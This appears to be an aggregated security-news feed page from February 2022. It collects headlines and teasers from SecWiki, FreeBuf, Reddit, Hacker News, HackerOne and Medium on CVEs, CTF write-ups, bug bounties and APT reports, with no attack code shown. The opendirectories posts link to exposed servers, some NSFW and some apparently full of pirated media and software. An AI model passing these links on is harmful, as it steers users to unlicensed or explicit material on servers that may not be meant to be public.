    SecWiki News 2022-02-11 Review
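    [HTB] Love Writeup by 0x584a PendingIntent Redirection: A Generic Privilege Escalation Method Against Android and Popular Apps by ourren Security Risks of Automated Machine Learning by ourren Deconstructing Open-Source IAST to Build a Powerful Gray-Box Security Tool by ourren For more recent articles, visit SecWiki  ( 2 min )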
  • Open

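    FreeBuf Morning News | Shanghai programmer sentenced to 10 months for deleting a code repository and leaving; credit card skimmers planted on 500 e-commerce sites
    A 29-year-old programmer surnamed Lu, without the company's permission, deleted on the day he resigned all of the system code for the JD Daojia platform, which was about to go live.  ( 1 min )
    Fake dnSpy - This chicken soup has been poisoned!
    dnSpy is a popular tool for debugging, modifying and decompiling .NET programs. Security researchers often use it when analyzing .NET programs or malware.  ( 1 min )
    Hackers attack oil facilities at European ports, sending oil prices soaring; Shanghai issues its first "Enterprise Data Compliance Guidelines"; Microsoft plans to acquire a cybersecurity company | Cybersecurity Weekly
    Eight global cybersecurity hot topics were collected from February 7 to February 11, 2022, involving Microsoft, Mandiant, Puma, Swissport and others.  ( 1 min )
    French regulator says Google Analytics poses data privacy risks
    The French regulator holds that the service does not take sufficient measures to protect data privacy rights when transferring data, which US intelligence agencies could exploit.
    Kimsuky is using xRAT to steal information
    ASEC analysts recently found that the Kimsuky group is using the xRAT malware (an open-source RAT customized from Quasar RAT).  ( 1 min )
    Arid Viper APT group launches attacks targeting Palestine
    The Arid Viper group uses content originally published by the Turkish state news agency Anadolu and the Palestinian MAAN Development Center as lures to attack Palestinian organizations.  ( 1 min )
    FreeBuf Weekly | More than 500,000 people affected by the Morley ransomware attack; hackers attack oil facilities at European ports
    Business services firm Morley Companies disclosed a user data breach in which a large amount of user data was stolen.  ( 1 min )
    SPD Bank Credit Card Center is hiring information security engineers
    Shanghai Pudong Development Bank Credit Card Center is hiring information security engineers.
    MIIT again solicits comments on the "Measures for Data Security Management in the Industry and Information Technology Field (Trial)"
    The Measures comprise eight chapters and forty-one articles, and stress that important data and core data must be stored within the country in accordance with the applicable laws and regulations, or undergo a data export security assessment as required by law and regulation.  ( 1 min )
    A brief look at musl heap exploitation techniques (DEBUG part)
    Recent competitions have featured more and more musl challenges, so I had to study musl heap exploitation to prepare for future competitions.  ( 1 min )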
  • Open

    AppSec best practices for security that sticks
    In the complex and dynamic world of application security, best practices are your best friends. This post shows how you can build an effective AppSec program based on tried and tested workflows and tools for vulnerability testing and remediation. READ MORE  ( 6 min )

  • Open

    How to crack RSA-512 on off-the-shelf hardware in 4 days
    submitted by /u/ScottContini [link] [comments]
    Five Vulnerabilities Explained in Moxa MXview for OT Networks
    submitted by /u/h4ck3dit [link] [comments]
    Safer entropy accumulation in Linux 5.18's RNG
    submitted by /u/zx2c4 [link] [comments]  ( 1 min )
    what is Walkme Extension used for? I have it installed and enforced by default without ability to disable it - in all Chrome browsers on the work laptop...
    submitted by /u/One-World-One-Love [link] [comments]  ( 1 min )
    🇬🇧 Gaining the upper hand(le) - Hunting for privilege escalations and UAC bypasses by looking for leaked handles in unprivileged processes by @APTortellini and @last0x00
    submitted by /u/last0x00 [link] [comments]  ( 1 min )
    Firejail oopsie
    submitted by /u/MonkeeSage [link] [comments]
  • Open

    Fuzzing for XSS via nested parsers condition
    Article URL: https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/ Comments URL: https://news.ycombinator.com/item?id=30292426 Points: 1 # Comments: 0  ( 5 min )
  • Open

    CVE-2022-0435: Remote Stack Overflow in Linux Kernel TIPC Module Since 4.8
    Article URL: https://www.openwall.com/lists/oss-security/2022/02/10/1 Comments URL: https://news.ycombinator.com/item?id=30291958 Points: 2 # Comments: 0  ( 6 min )
  • Open

    MakerDAO Launches $10m Bug Bounty On Immunefi
    Immunefi has grown by leaps & bounds since we first launched in December 2020 and now protects over $100 billion (that’s Billion with a B)… Continue reading on Immunefi »  ( 2 min )
    Programming languages and Cybersecurity
    Codes are fundamental blocks of logic which drives businesses all around the world today. Continue reading on Medium »  ( 6 min )
    100 Days of Hacking - Day 6
    Objectives of day 6 : Continue reading on Medium »  ( 1 min )
    100 Days of Hacking — Day 5
    Objectives of day 5 : Continue reading on Medium »  ( 1 min )
    Launching Superfluid Bug Bounty Program with Immunefi
    Our mission to establish the Superfluid Protocol as a key component of the financial rails of the future requires more than technological… Continue reading on Superfluid Blog »  ( 3 min )
    Buy any Products For Free From Bewakoof.com || Bug-Bounty $$
    Hi, Here we will see how you can buy any product for free from Bewakoof.com Continue reading on Medium »  ( 2 min )
    Internet-Wide Study: State Of SPF, DKIM, And DMARC — RedHunt Labs
    At RedHunt Labs, (under Project Resonance), we frequently conduct internet-wide research in different shapes and formats to understand the… Continue reading on Medium »  ( 7 min )
    How I earned $2,500 from discovering vulnerabilities
    Peace be upon you, and the mercy and blessings of God Continue reading on Medium »  ( 1 min )
  • Open

    Are there only 2 types of people in this world? — An OSINT analysis
    Today as I was scrolling through my LinkedIn’s home feed I came across this image that had been liked by someone from my network. Continue reading on Medium »  ( 3 min )
    Cyberspace Vault Osint
    Task Continue reading on Medium »
  • Open

    [h1-2102] Information disclosure - ShopifyPlus add user displays existing Shopify ID fullname
    Shopify disclosed a bug submitted by francisbeaudoin: https://hackerone.com/reports/1083922 - Bounty: $1900
    Bypass For #997350 your-store.myshopify.com preview link is leak on third party website Via Online Store
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1015283 - Bounty: $500
    Password reset token leak via "Host header" on third party website
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1092831
    Orders full read for a staff with only `Customers` permissions.
    Shopify disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1392032 - Bounty: $800
    Critically Sensitive Spring Boot Endpoints Exposed
    Semrush disclosed a bug submitted by a_d_a_m: https://hackerone.com/reports/1022048 - Bounty: $5000
    Sending Arbitrary Requests through Jupyter Notebooks on gitlab.com and Self-Hosted GitLab Instances
    GitLab disclosed a bug submitted by iwis: https://hackerone.com/reports/970869 - Bounty: $1500
    Installing Gitlab runner with Docker-In-Docker allows root access
    GitLab disclosed a bug submitted by jafarakhondali: https://hackerone.com/reports/1417211 - Bounty: $100
    Node.js Certificate Verification Bypass via String Injection
    Node.js disclosed a bug submitted by bengl: https://hackerone.com/reports/1429694
  • Open

    RCE vs Code Injection
    Hi, what's the difference between RCE and Code Injection ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    What is the type of vulnerability called where you put the wrong file extension in the URL on a file that you shouldn't have access to?
    I accidentally discovered something like that during a very beginners CTF challenge. We were supposed to do an SQL injection to get a config file but I for some reason put config.php in the URL and got the file to the browser. I reported it to the people holding the CTF and they said they reported it to the maker of the server software. I believe the software was open source so it would be fun to find a note somewhere that they fixed it. That is why I wonder what this type of vulnerability is called. submitted by /u/HugoTRB [link] [comments]  ( 2 min )
    What’s your pentesting workbench?
    I am going to create a set of servers for pentest and I would like your suggestions/advice/comments. I would buy three servers , one for exploit dev /marvel analysis preferably a debian(kali or Ubuntu ) and other two for pentesting . submitted by /u/Sea_Finish6689 [link] [comments]  ( 3 min )
  • Open

    Email Forensics CTF Now Live
    Hello, folks! Our Email Forensics Capture The Flag Competition is now live! The event comprises weekly challenges for ten weeks. https://m.klr.co/kMhMA Good luck, and have fun! submitted by /u/MetaspikeHQ [link] [comments]  ( 1 min )
    Black screen and flashing cursor on boot when running SIFT Workstation in VirtualBox
    I'm not sure if this is the correct place to post, apologies if it isn't. I have downloaded the SIFT Workstation OVA file from Sans website and opened it in VirtualBox. I get a boot menu where I can either just start Ubuntu or run the memory test application. Choosing Ubuntu, I just get a black screen with a flashing underscore cursor in top left corner. It has been standing there for 10 minutes now and nothing happens. It never gets to the logon screen. I have seen others mention the issue when searching for it, but I haven't found any mentioned solutions. Any ideas? submitted by /u/kennethfinnerup [link] [comments]  ( 1 min )
    Question about $Ntuninstall files..
    So I was nosing around an old HDD that had XP installed, and I come across these folders in the WINDOWS directory. Inside them, there are files called “spuninst”. So I open them in notepad and there is a system.snapshot heading with a bunch of programs and such listed. My first question is: Is this every program that was installed at this particular moment in time on the computer? Is there a way to see when past programs were installed and subsequently deleted if there are no files to look at creation dates? Thanks for any help submitted by /u/Pubh12 [link] [comments]  ( 1 min )
  • Open

    Vulnerability Reward Program: 2021 Year in Review
    Article URL: https://security.googleblog.com/2022/02/vulnerability-reward-program-2021-year.html Comments URL: https://news.ycombinator.com/item?id=30289291 Points: 1 # Comments: 0  ( 12 min )
    Responding to and Learning from the Log4Shell Vulnerability
    Article URL: https://www.hsgac.senate.gov/hearings/responding-to-and-learning-from-the-log4shell-vulnerability Comments URL: https://news.ycombinator.com/item?id=30284252 Points: 1 # Comments: 0  ( 1 min )
  • Open

    SecWiki News 2022-02-10 Review
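    Top 10 web hacking techniques of 2021 by ourren A Tale of DOM-based XSS! by ourren Detecting Beacon Communication with RITA by ourren CVE-2021-33742: Analysis of the Internet Explorer MSHTML Heap Out-of-Bounds Write Vulnerability by ourren The Defensive Dilemma Enterprises Face Against APT-Style Attacks by ourren CobaltStrike Check-In over Blockchain Networks and Its Detection by ourren For more recent articles, visit SecWiki  ( 2 min )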
  • Open

    Lots of porn photos (NSFW)
    submitted by /u/Boobalizer [link] [comments]
    [NSFW] nastyflixxx.net
    http://www.nastyflixxx.net/clips/?C=S;O=A submitted by /u/mrcave81 [link] [comments]
    Some NOAA Hurricane Files
    https://www.nhc.noaa.gov/video/ Nothing really that interesting submitted by /u/420danger_noodle420 [link] [comments]
    FTP of a Russian ISP (Ufanet)
    You can find some good stuff in it I think? http://ftp.ufanet.ru/
    Url: http://ftp.ufanet.ru/   Urls file
    Extension (Top 5)        Files            Size
    .iso                     363              384,42 GiB
    .xz                      283              105,96 GiB
    .img                     136              52,78 GiB
    .tar                     16 647           29,78 GiB
    .bz2                     112              29,21 GiB
    Dirs: 10 532 Ext: 188    Total: 24 123    Total: 664,74 GiB
    Date (UTC): 2022-02-10 01:01:31   Time: 00:03:28   Speed: 2,01 MB/s (16,1 mbit)
    Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/)
    submitted by /u/VoXaN24 [link] [comments]
    Some site's wp-content/uploads pages
    https://www.the8bitguy.com/wp-content/uploads/ https://tomorrowcorporation.com/blog/wp-content/uploads/ submitted by /u/ilikemacsalot [link] [comments]
    Informatic related Stuff (In French)
    https://download.d-l.fr/apache_listing/ or https://download.d-l.fr (It's the same content but different UI ) http://s472165864.onlinehome.fr/anywarare/index.php?dir=|
    Url: https://download.d-l.fr/apache_listing/   Urls file
    Extension (Top 5)        Files            Size
    .iso                     112              233,52 GiB
    .zip                     101              24,71 GiB
    .exe                     169              17,93 GiB
    .xz                      7                4,65 GiB
    .1                       1                4,4 GiB
    Dirs: 150 Ext: 46        Total: 572       Total: 296,05 GiB
    Date (UTC): 2022-02-10 00:55:22   Time: 00:00:35   Speed: 23,48 MB/s (187,8 mbit)
    Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/)
    Url: http://s472165864.onlinehome.fr/anywar...   Urls file
    Extension (Top 5)        Files            Size
    .zip                     808              69,32 GiB
    .iso                     26               63,33 GiB
    .exe                     604              60,11 GiB
    .001                     2                6,6 GiB
    .002                     2                6,4 GiB
    Dirs: 285 Ext: 23        Total: 1 868     Total: 212,62 GiB
    Date (UTC): 2022-02-10 00:59:03   Time: 00:00:09   Speed: Failed
    Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/)
    submitted by /u/VoXaN24 [link] [comments]  ( 1 min )
  • Open

    Watch "Welcome to C0V3RT - Exploration of ALL THINGS "Covert Entry"" on YouTube
    submitted by /u/Can0pen3r [link] [comments]
    Dump Information for Process using GetTokenInformation
    In this post, you will get a very thorough step-by-step walkthrough on building your own process token dumper in C++ which will help you in knowing your target better before launching another post exploitation attack. https://tbhaxor.com/dumping-token-information-in-windows/ submitted by /u/tbhaxor [link] [comments]
  • Open

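    Perks | Colorful picks for a happy Lantern Festival: come celebrate at the FB Mall!
    February 14-17: celebrate the Lantern Festival at the FB Mall
    Cloned Pirate Bay sites are serving malicious ads to millions of users
    CyberNews security researchers found that 5 malicious sites posing as the well-known BitTorrent piracy site The Pirate Bay serve malicious ads to more than 7 million users every month.  ( 1 min )
    Guangdong Province Public Data Security Management Measures (Draft for Comment) released, emphasizing the security of public data
    The Draft for Comment has six chapters and thirty-two articles; it strengthens public data security management for digital government, regulates public data processing activities, promotes the orderly development and use of data resources, and protects the lawful rights and interests of individuals and organizations.
    Notes on an incident response to a cryptomining virus
    Notes on an incident response to a cryptomining virus  ( 1 min )
    Mini program testing workflow
    The workflow has two parts: unpacking can uncover information disclosure issues and hidden interfaces, while traffic capture can be used to test for logic flaws and API security issues.  ( 1 min )
    Be careful with Windows 11 updates: malware already has its eye on them
    Just as Windows 11 enters its broad deployment phase, the RedLine malware gang has quietly set its sights on this wave of upgrades and has made thorough pre-attack preparations.  ( 1 min )
    FreeBuf Morning Brief | Intel finds 16 new BIOS-related vulnerabilities; Pirate Bay clones target millions of users with malware
    CyberNews researchers found five clones of The Pirate Bay that serve malicious ads to more than 7 million users every month.  ( 1 min )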

  • Open

    Is there a way to find out what server/IP address a program accesses?
    I'm trying to find the server so I can ping to that manually but I don't know if that's possible. I'm almost a beginner in this, I want to know the pinging time. submitted by /u/Mayhem_8116 [link] [comments]  ( 1 min )
    Why is it common practice to reset a password after a few failed attempts?
    Hi Netsec people! Every once in a while I will get emails saying that some website/service I’m registered on has reset my password because of too many failed log in attempts. Now I’m not too surprised by the attempts, since according to HaveIBeenPwned, my credentials have been ‘exposed’ over 30 times in breaches dating back to the early 2010s. However, a while back I gave up my terrible practice of using 1 password across multiple services and migrated to using a password manager, and now all of my passwords to every service I’m on are randomly generated, so I’m not too worried by these attempts. My question is this: Why does the most common practice seem to be for services to reset your password after a few failed attempts? To me that seems like if x log in attempts failed, the password was robust/held up—why force the user to change it? If the user used a random generator, repeated tries that are time separated (I.e. wait 10min before trying again) probably won’t get an attacker anywhere. If a person isn’t using a password manager/generator then forcing the user to reset might actually lead them to use a weaker password since they will have to come up with something familiar, and there are only so many familiar items a person can keep track of at a time… I’d love to hear some insights on to why this reset after x tries approach appears to be such a pervasive (and counterintuitive) practice! Sorry if this isn’t the right place for a question like this! submitted by /u/KrishanuAR [link] [comments]  ( 2 min )
    Hosts making DNS queries to malicious site. How to dig deeper and find source?
    I have some infected hosts in the LAN communicating with a C&C server and bots, but that URL seems to be hidden behind the Cloudflare CDN as per Wireshark sniffing on an infected host. In other words, I must say hosts are making DNS queries to a malicious site. Our PAs with DNS filtering have blocked the domain since it is flagged as malicious. How can I find the source of infection on the host? Are there any tools I can use to find which process or application is making the DNS queries? Any advice on how to dig deeper and find what process is making these queries so we can get rid of these logs? submitted by /u/techno_it [link] [comments]  ( 3 min )
    Does this report that Palestinian threat actor is behind new Mid East phishing attacks sound right?
    Known Palestinian threat actor MoleRats is likely behind a recent malicious email campaign targeting Middle Eastern governments, foreign-policy think tanks and a state-affiliated airline with a new intelligence-gathering trojan dubbed NimbleMamba, researchers said via Threatpost. https://threatpost.com/molerats-apt-trojan-cyberespionage-campaign/178305/ submitted by /u/Technical-Tea-4902 [link] [comments]  ( 1 min )
    RCE vs Command Injection
    Hi, what's the difference between RCE and Command Injection ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    Setting up a security program
    So a long time ago some of the higher ups decided we should have a security program within our product development, the idea was that there would be one person in each scrum team responsible for promoting security and they would get some additional training to help with that. Like a lot of these central programs it continued for a few months and then was quickly forgotten about. Now I've been tasked with setting up our own version in the division as the central version is pretty much dead but they're still pushing the general idea. This is what is currently on my list - Security champions to be Security+ certified (I know it's a broad basic cert but I figure we can get funding for this and then progress to more advanced targeted training) - Add a method into Jira for tracking security related issues separately - Create discrete security projects as epics so we can fix some of the legacy issues completely and not worry about them anymore (current ideas for these include: removing third party services to reduce exposure, updating some very old libraries, updating SQL user security etc) Any other ideas of things I could introduce? submitted by /u/dbxp [link] [comments]  ( 3 min )
    CVSS calculation weight reasoning
    Hello AskNetsec. I was wondering if there is a resource describing the CVSS calculation reasoning. Not just how the CVSS is calculated but also the reasoning behind the weight of the different variables. For example in the specification (https://www.first.org/cvss/specification-document) under "CVSS v3.1 Equations", WHY is ISS = 6.42 * ISS? Where does 6.42 come from? Is there any research paper or whitepaper for this? submitted by /u/someuserman [link] [comments]  ( 1 min )
    Question: patching built-in Python on macOS
    Do I need to patch / install a new version of Python manually, in order to fix the vulnerability of Python on my macOS? For example, my macOS is upgraded to Monterey 12.1, but my Python version is still 3.7.9, which is vulnerable to CVE-2021-3177. I tried to search for whether the vulnerability, say CVE-2021-3177, affects my version of macOS. However, Apple doesn't seem to have put that information into their security update documentation. submitted by /u/20151124 [link] [comments]  ( 1 min )
  • Open

    npm weak links
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]
    New release of 🔥Kubesploit v0.1.3🔥
    submitted by /u/jat0369 [link] [comments]
    Top 10 web hacking techniques of 2021
    submitted by /u/albinowax [link] [comments]  ( 1 min )
    My SQLi adventure or: why you should make sure your WAF is configured properly
    submitted by /u/gsk-upxyz [link] [comments]
  • Open

    Is the Google Bucket Meant To Be Publicly Listable? https://cdn.shopify.com/shop-assets/
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102546 - Bounty: $500
    staffOrderNotificationSubscriptionDelete Could Be Used By Staff Member With Settings Permission
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102660 - Bounty: $500
    staffOrderNotificationSubscriptionCreate Is Not Blocked Entirely From Staff Member With Settings Permission
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102652 - Bounty: $900
    Race condition in User comments Likes
    Zomato disclosed a bug submitted by 0xdexter: https://hackerone.com/reports/1409913 - Bounty: $150
    Reflected xss on ads.tiktok.com using `from` parameter.
    TikTok disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1452375 - Bounty: $6000
  • Open

    Coordinated vulnerability disclosure (CVD) for open source projects
    Article URL: https://github.blog/2022-02-09-coordinated-vulnerability-disclosure-cvd-open-source-projects/ Comments URL: https://news.ycombinator.com/item?id=30278015 Points: 1 # Comments: 0  ( 8 min )
  • Open

    Basic Web Technologies Knowledge required for starting with the web Exploitation Part 1
    Hello Guys Myself Manan Aggarwal BTech Student is here Present you the information about the Basic Technology which you need to require… Continue reading on Medium »  ( 4 min )
    Hacking with Rake
    Rake is a utility that can be used to automate tasks. For example, if a program needs to be set up in a certain way. Rake could be used to… Continue reading on Medium »
    How i made 15k$ from Remote Code Execution Vulnerability
    Hello Everyone 👋 Continue reading on Medium »  ( 1 min )
    How I hacked Google to read files from their servers for free!
    Hey Guys, This is Harish! I used to hunt to Microsoft and Google VRP, This is my first write up! Continue reading on Medium »  ( 1 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it. Continue reading on InfoSec Write-ups »  ( 3 min )
    QuickSwap’s New UI Alpha $50,000 Bug Bounty
    TL; DR: Continue reading on Medium »  ( 1 min )
    XDAG new version of wallet (0.4.0) officially released
    Repost of the 2011–11–05 news on xdag.io Continue reading on Medium »  ( 1 min )
    XDAG Mars Project
    repost of 2021–05–09 news on xdag.io Continue reading on Medium »  ( 4 min )
    XDAG Java Edition Testing Tutorial
    Hello to all, As some of you know, we are currently working on making the project more attractive to developers. Continue reading on Medium »  ( 2 min )
    Login function module: User Authentication .
    Input: User id and Password SQL: select * from admin where user_id = 'admin' and password='****' Continue reading on Medium »
  • Open

    Introducing BloodHound 4.1 — The Three Headed Hound
    Prior Work Continue reading on Posts By SpecterOps Team Members »  ( 3 min )
    CRTO Review (Certified Red Team Operator)
    I had a certificate by successfully completing the CRTO exam in the past days, and while my knowledge was still fresh, I decided to write… Continue reading on Medium »  ( 4 min )
    Raspberry Pi Pico as a Rubber Ducky
    Setup Continue reading on Medium »  ( 1 min )
  • Open

    RootMe | TryHackMe Walkthrough
    Write-ups TryHackMe Challenge  ( 3 min )
    Horizontall from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
    The find command-TryHackme
    writeup  ( 3 min )
    Angler Exploitation Kit Infection 1 — Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Brim to analyze a PCAP file that captured network traffic belonging to an Angler…  ( 9 min )
    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)…  ( 3 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it.  ( 3 min )
    [Day 7] Web Exploitation Migration Without Security | Advent of Cyber 3 (2021)
    Today we will learn about NoSql Injection, as you know this is my first time of NoSql Injection, so I was learning a lot from tryhackme.  ( 3 min )
    Day 22 Cross Site Scripting — Part 1 #100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 7 min )
    Host Header Injection Attacks
    Host Header injection is not the type of attack that you would normally find in CTFs or security challenges. However, it is widespread in…  ( 4 min )
    LazyAdmin [TryHackMe Writeup]
    The hacker Aleksey hacks TryHackMe’s LazyAdmin room. They assumed because the admin is “lazy,” that this would be easy. They were so wrong. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    SecWiki News 2022-02-09 Review
    2022 Ransomware and Malware Report by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Movies and TV-shows (Good speed)
    submitted by /u/lnsideMyHead [link] [comments]
    Anime and some Music
    submitted by /u/mingaminga [link] [comments]
    Index of /Johnny Cash CDs/
    submitted by /u/mingaminga [link] [comments]
    A lot of software, Games, Film and series in various language
    http://103.222.20.150/ftpdata/
    | Url: http://103.222.20.150/ftpdata/ | | Urls file |
    | Extension (Top 5) | Files | Size |
    | .mp4 | 12,912 | 11.59 TiB |
    | .mkv | 9,042 | 9.3 TiB |
    | .avi | 2,965 | 1.38 TiB |
    | .rar | 21 | 36.18 GiB |
    |  | 16 | 19.15 GiB |
    | Dirs: 16,920 Ext: 59 | Total: 46,363 | Total: 22.4 TiB |
    | Date (UTC): 2022-02-08 23:34:44 | Time: 01:48:31 | Speed: 0.00 MB/s (0.0 mbit) |
    Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/)
    submitted by /u/VoXaN24 [link] [comments]  ( 1 min )
  • Open

    CVE-2022-22718: Windows Print Spooler Privilege Escalation
    Article URL: https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81?gif=true Comments URL: https://news.ycombinator.com/item?id=30273774 Points: 3 # Comments: 1  ( 11 min )
    CVE-2022-21703: cross-origin request forgery against Grafana
    Article URL: https://jub0bs.com/posts/2022-02-08-cve-2022-21703-writeup/ Comments URL: https://news.ycombinator.com/item?id=30270751 Points: 1 # Comments: 0  ( 10 min )
  • Open

    Simply GeoEstimation — OSINT Challenge 13
    On Dec 20, 2021, OSINT Dojo shared a OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 10
    In this article I will explain how to solve Hacktoria’s Geolocation 10 challenge. However, I must give a quick disclaimer first. I already… Continue reading on Medium »  ( 5 min )
  • Open

    Can deleted WhatsApp conversations from an iPhone be recovered without backup?
    I deleted a very important conversation on WhatsApp 2 days ago. The iPhone 12 (running iOS 15.x) in question has been powered off and hasn't been used since. I understand that WhatsApp saves a backup copy in Android phones' local memory every day at 2am and erases them every 7 days, however I can't find anything about iOS devices. To make matters worse, I deleted the conversation around 7pm, so before the local backup could trigger at 2am. Is there any chance to get this conversation back without any backup? And what would my chances be with a Cellebrite device? submitted by /u/Strangedreamest [link] [comments]  ( 2 min )
  • Open

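    Information Security Technology: Guidelines for Lifecycle Security Management of Mobile Internet Applications (Apps) (Draft for Comment) released
    The Draft for Comment has six chapters: scope, normative references, terms and definitions, abbreviations, overview, and lifecycle management. It gives guidance on security requirements, security recommendations, security management and more.
    FreeBuf Morning Brief | "Roaming Mantis" is targeting Europe; Vodafone Portugal hit by a large-scale cyberattack
    Vodafone Portugal suffered a cyberattack that severely disrupted communications and television services in the country.  ( 1 min )
    SlowMist: a detailed analysis of US law enforcement's cracking of the 2016 Bitfinex hack
    One open question: who is the hacker who actually attacked Bitfinex and stole the coins?  ( 1 min )
    NetWalker ransomware member sentenced to 80 months in prison
    Canadian man Sebastian Vachon-Desjardins was recently sentenced to 6 years and eight months in prison for taking part in NetWalker ransomware attacks.
    On SSRF and various bypass techniques
    SSRF vulnerabilities arise mainly because an interface exposed by the server takes a URL parameter for the content to be requested and does not filter the URL parameter sent by the client.  ( 1 min )
    Puma suffers data leak after ransomware attack; Microsoft fixes 48 security vulnerabilities | Global cybersecurity highlights for February 9
    Sportswear maker Puma suffered a data breach after a ransomware attack in December 2021 on Kronos, one of its North American workforce management service providers.
    Survey of the state of global industrial cybersecurity
    [Editor's note] Industrial organizations faced major challenges in 2021. The cyberattacks on the water facility in Oldsmar, Florida, on Colonial Pipeline and on JBS, as well as Solar  ( 1 min )
    "Roaming Mantis" malware extends its reach into Europe
    Criminals can use stolen photos to obtain money in other ways, such as blackmail or sexual harassment.  ( 1 min )
    Israeli surveillance firm QuaDream exposed
    "According to five people familiar with the matter, Israeli surveillance firm NSO Group exploited a flaw in Apple's software in 2021 to break into iPhones, and the flaw was also abused by a competing company." According to the article published by Reuters, "it was revealed that the company, named QuaDream, is a smaller and lesser-known Israeli firm that also develops smartphone hacking tools for government clients." QuaDream is a company that former Israeli military officer Ilan Dabelstein and two former NSO employees, Guy Geva and  ( 1 min )
    Microsoft disables the ms-appinstaller protocol to stop malware from spreading
    Microsoft announced that it has temporarily disabled the MSIX app installer's ms-appinstaller protocol on Win10/11 systems to keep it from being abused by malware.
    Update promptly: Microsoft fixes 48 important vulnerabilities and 1 zero-day in February
    On February 8, 2022, Microsoft released a series of vulnerability patches, fixing 48 vulnerabilities in total as well as one zero-day vulnerability.  ( 1 min )
    "14th Five-Year" Development Plan for Financial Standardization released, strengthening standards-based protection for financial cybersecurity
    The Plan calls for strengthening standards-based protection for financial cybersecurity, improving the financial sector's cybersecurity and data security standards system, and establishing and improving a standards system for protecting the financial sector's critical information infrastructure to support stronger security protection capabilities.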

  • Open

    Hypothetical incident: what would be an appropriate response?
    Hello AskNetSec! I am curious what you all would consider an appropriate response to an incident such as a user reporting that they've clicked on a phishing link. Personally, I believe it is appropriate to probe about what popped up after clicking the link, whether or not they entered any of their information, and whether or not they notice any abnormal behavior on their computer after clicking on the link. After that, have the user change their password as a precaution and move on to begin monitoring. I figure between the questions assuring they did nothing more than click, a password change, existing security controls such as CrowdStrike, and monitoring for abnormal behavior, there isn't much more that makes sense to do. Others on my team seem to think it's worth downloading Microsoft Safety Scanner and running a full system scan, which I argue doesn't hurt, but also probably doesn't add much value unless something is seen on the user's computer that would prompt further investigation. Especially since I can't imagine Microsoft Safety Scanner is going to pick up on something that CrowdStrike does not. Understandably, different companies may expect different responses based on established policy and regulations. But I want to leave it kind of open ended and see what other IT and security professionals believe is appropriate for these types of incidents? How deep do you go for these types of things? submitted by /u/unseenspecter [link] [comments]  ( 2 min )
    IR Retainer things to consider
    When looking to purchase Incident Response Retainers what are things you wish you knew prior to purchasing? Are there any gotchas that should be considered? What can I learn from you in your experience with this? submitted by /u/gnomeparadox [link] [comments]  ( 3 min )
    What level of knowledge should Tier 1 SOC analysts have to enter the job?
    Each of the sub-branches of cyber security is like a different world for itself, there is no end when you want to learn. For example, we agree that it is necessary to have knowledge about malware analysis for the position of security analyst. However, if you try to improve yourself in malware analysis, you can probably only work on malware analysis for years. At this point, many people do not know how much technical knowledge is required to get started. For this reason, many people can not be accepted to the job due to an insufficient level in job applications, or the starting process may take longer as people spend too much time on training and develop technical knowledge more than the level required to start the job. In your opinion, what should be the technical level required to start working in the security analyst position? submitted by /u/umuttosun [link] [comments]  ( 2 min )
    Infosec as "just" a job?
    Hi, I'm a CS student who's been learning a mishmash of basics to get into infosec — some assembly, wifi cracking, sql injection, etc under my belt, just the very basics, but I'm kind of overwhelmed by how... Enthusiastic and into it everyone seems to be. I'm not sure I'm "built" for it either, since I can't relate to the culture about stuff like lockpicking and causing trouble in school networks and stuff. Never done any social engineering in my life. I'm more of a science guy, and I went into CS because I'm aiming for a practical job that's in STEM. That's it, really. I'm willing to learn things in my spare time but I can't dredge up the same intense curiosity I see in people I've seen both IRL and online in security. Will I drown? Should I look elsewhere? submitted by /u/Wild_Rutabaga_3099 [link] [comments]  ( 4 min )
    Malware playbooks
    I was wondering what your malware playbooks look like. We got a bunch of malware alerts today for items that were deleted by the AV. It caused some internal discussions on common practices. submitted by /u/xX_s0up_Xx [link] [comments]  ( 1 min )
    How to become a pen tester ?
    submitted by /u/AlmightyMemeLord404 [link] [comments]  ( 3 min )
    Any insights on purchasing Palo Alto firewalls for home/lab use?
    I see a wide range of pricing for the PA-200 through 400 models and am not sure why. Anybody else running a small PAN device in their homelab have insight on purchasing a refurb and maybe one or two subscriptions setup on it? Is it best to look for an authorized dealer or is eBay safe? submitted by /u/EnterNam0 [link] [comments]  ( 1 min )
  • Open

    Kubernetes for pentesters
    There are countless articles on hacking Kubernetes clusters, but is there any research or repos on how you can use k8s for pen testing? One idea is using a cluster in which each node is a “person” that has access to a specific machine or to a different machine. I’m open to other ideas regarding the usage of k8s to improve hacking automation submitted by /u/sirlordjax [link] [comments]  ( 1 min )
    Invisible Sandbox Evasion - Check Point Research
    submitted by /u/dmchell [link] [comments]
